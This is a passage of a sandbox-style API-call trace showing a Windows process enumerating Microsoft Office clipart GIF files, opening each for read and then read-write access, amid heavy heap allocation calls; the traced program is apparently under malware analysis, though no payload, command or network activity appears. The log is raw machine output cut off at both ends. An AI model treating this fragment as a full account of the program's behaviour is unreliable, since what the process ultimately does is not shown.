(HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0100.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0100.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0100.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0100.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.518] AreFileApisANSI () returned 1 [0100.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0100.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.518] AreFileApisANSI () returned 1 [0100.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0100.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 69 [0100.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.519] GetFileType (hFile=0x368) returned 0x1 [0100.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0100.520] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.520] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.520] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.520] CloseHandle (hObject=0x368) returned 1 [0100.520] AreFileApisANSI () returned 1 [0100.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a9f0 [0100.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a9f0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 69 [0100.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.521] GetFileType (hFile=0x368) returned 0x1 [0100.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0100.521] CloseHandle (hObject=0x368) returned 1 [0100.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0100.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0100.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0100.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0100.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0100.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0100.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0100.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.522] AreFileApisANSI () returned 1 [0100.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0100.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 69 [0100.522] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e73)) returned 1 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0100.522] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.522] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.522] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec210f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec210f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec210f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x205, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00090_.GIF", cAlternateFileName="")) returned 1 [0100.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0100.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0100.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0100.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0100.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0100.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.523] AreFileApisANSI () returned 1 [0100.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0100.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.523] AreFileApisANSI () returned 1 [0100.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0100.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 69 [0100.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.525] GetFileType (hFile=0x368) returned 0x1 [0100.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0100.525] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.525] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.525] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.525] CloseHandle (hObject=0x368) returned 1 [0100.526] AreFileApisANSI () returned 1 [0100.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0100.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 69 [0100.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.526] GetFileType (hFile=0x368) returned 0x1 [0100.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0100.526] CloseHandle (hObject=0x368) returned 1 [0100.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0100.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0100.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0100.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0100.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0100.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0100.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.527] AreFileApisANSI () returned 1 [0100.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0100.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 69 [0100.527] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00090_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec210f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec210f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec210f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x205)) returned 1 [0100.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0100.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 